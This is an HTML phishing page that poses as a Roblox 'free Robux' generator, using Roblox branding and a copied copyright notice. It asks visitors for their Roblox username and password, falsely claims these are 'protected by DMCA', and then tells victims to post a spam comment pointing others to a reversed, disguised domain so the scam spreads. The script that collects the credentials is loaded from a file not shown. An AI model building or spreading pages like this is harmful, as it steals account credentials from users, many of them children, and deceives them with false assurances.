<!DOCTYPE html>
<html>
	<head>
		<meta charset="UTF-8">
		<title>Roblox FREE ROBUX 2017</title>
		<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet"> 
		<style>
			body{
				font-family: "Source Sans Pro";
			}
			.header{
				background:#0074BD;
				color:white;
				margin-top:-8px;
				margin-left:-8px;
				padding-left:3px;
				padding-top:3px;
				margin-right:-8px;
			}
			.content{
				text-align:center;
			}
			.copyright{
				position:absolute;
				bottom:0;
				color:gray;
				font-size:9px;
				left:30%;
			}
			#LoginButton {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 14px;
    			margin-top: 10px;

			}
			#OkButton {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 14px;
    			margin-top: 10px;

			}
			#LoginButton:hover {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 14px;
    			cursor:pointer;
			}
			#OkButton:hover {
    			background-color: #00B259;
    			border: 1px solid;
    			border-color: #006633;
    			border-radius:2px;
    			color: white;
    			font-weight: 400;
    			font-size: 14px;
    			cursor:pointer;
			}
			.prettygood{
				color:#006600;
				font-size:10px;
			}
			.prettyevil{
				color:#660000;
				font-size:10px;
			}
			.crichalka{
				background:black;
				color:white;
				border-left-style:solid;
				border-left-color:gray;
				border-left-width:10px;
				border-radius:3px;
				display:inline-block;
			}
		</style>
		 <script type="text/javascript" src="https://code.jquery.com/jquery-latest.min.js"></script>
	</head>
	<body>
		<div class="header">
			<img src="icon.png" width=128>
		</div>
		<div class="content">
			<p id="stepinf">Step one</p>
			<br>
			<div id="stepone">
				<p>Login for next step:</p>
				<div class="loginwindow">
					<p>Login</p>
					<input id="logininpt">
					<br>
					<p>Password</p>
					<input id="psswdinpt">
					<br>
					<input type="button" value="OK" id="LoginButton">
					<p class="prettyevil">Warning: you need to be BC</p>
					<p class="prettygood">Your account data (logins and passwords) are protected by DMCA.</p>
				</div>
			</div>
			<div id="steptwo">
				<p>Enter amount of R$ you want:</p>
				<input>
				<input type="button" value="OK" id="OkButton">
			</div>
			<div id="stepthree">
				<p>Copy and paste this text in comment section of any 3 shirts:</p>
				<p class="crichalka">I just found out how to glitch robux! Go to lm.7102xuboreerf (type backwards) , and log in to get into the administration tools of roblox!</p>
			</div>
			<p class="copyright">©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
		</div>
		<script type="text/javascript" src="index.js"></script>
	</body>
</html>